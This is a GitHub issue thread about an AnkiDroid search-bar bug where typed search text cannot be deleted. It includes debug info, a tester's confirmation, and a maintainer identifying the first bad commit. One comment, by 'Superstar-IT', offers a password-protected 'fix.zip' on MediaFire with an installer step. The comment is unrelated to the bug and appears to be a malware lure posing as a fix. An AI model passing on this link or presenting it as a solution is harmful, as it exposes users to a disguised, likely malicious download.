### ISSUE TITLE
[BUG]: Can't delete characters of field search after an initial search

### ISSUE THREAD

**Issue by tassa-yoniso-manasi-karoto** [ankidroid/Anki-Android#16983]
### Checked for duplicates?

- [X] This issue is not a duplicate

### Does it also happen in the desktop version?

- [X] This bug does not occur in the latest version of Anki

### What are the steps to reproduce this bug?

After an initial search such as front:dog the characters of front:dog can no longer be deleted from the search bar

[Recording_2024-08-28-10-06-29.webm](https://github.com/user-attachments/assets/9823868b-4c15-484e-9682-134e545de1a3)

### Expected behaviour

They should be deleted

### Actual behaviour

They aren't deleted

### Debug info

```text
AnkiDroid Version = 2.19beta1 (6630ff411d643bf03206e106c4d940dc7076e738)

Backend Version = 0.1.40-anki24.06.3 (24.06.3 d678e39350a2d243242a69f4e22f5192b04398f2)

Android Version = 12 (SDK 31)

ProductFlavor = full

Hardware = timelm

Webview User Agent = Mozilla/5.0 (Linux; Android 12; LM-V600 Build/SKQ1.211103.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36

ACRA UUID = 7b39fb43-528f-4fa8-b8dd-a53a3c863516

FSRS Enabled = true

Crash Reports Enabled = true
```

### Research

- [X] I am reporting a bug specific to AnkiDroid (Android app)
- [X] I have checked the [manual](https://ankidroid.org/docs/manual.html) and the [FAQ](https://github.com/ankidroid/Anki-Android/wiki/FAQ) and could not find a solution to my issue
- [X] (Optional) I have confirmed the issue is not resolved in the latest alpha release ([instructions](https://docs.ankidroid.org/manual.html#betaTesting))

**Comment by brishtibheja** [comment]
I'm testing with latest beta and in my case, the text keeps reappearing. For example, `dog` gets deleted in three backspaces and reappears again with the next tap.

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by david-allison** [comment]
@SanjaySargam FYI

```
e1a553b3cf806848b6c8b6c87a8c321af71af83a is the first bad commit
commit e1a553b3cf806848b6c8b6c87a8c321af71af83a
```

* e1a553b3cf806848b6c8b6c87a8c321af71af83a -> https://github.com/ankidroid/Anki-Android/pull/16795
